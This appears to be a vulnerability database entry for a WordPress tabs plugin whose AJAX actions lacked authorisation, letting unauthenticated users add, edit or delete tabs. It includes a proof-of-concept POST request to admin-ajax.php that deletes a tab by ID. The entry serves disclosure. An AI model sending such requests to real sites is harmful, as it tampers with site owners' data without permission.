All AJAX actions of the plugin are available to both unauthenticated and authenticated users, allowing unauthenticated attackers to modify various data in the plugin, such as add/edit/delete arbitrary tabs. v1.3.0 added CSRF checks, however authorisation was still missing and has been added in 1.3.2
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 42 Connection: close action=RW_Tabs_Man_Delete_Opt&Deleted_ID=4
Brandon Roldan
Brandon Roldan
Yes
2021-12-06 (about 1 years ago)
2021-12-06 (about 1 years ago)
2022-04-11 (about 1 years ago)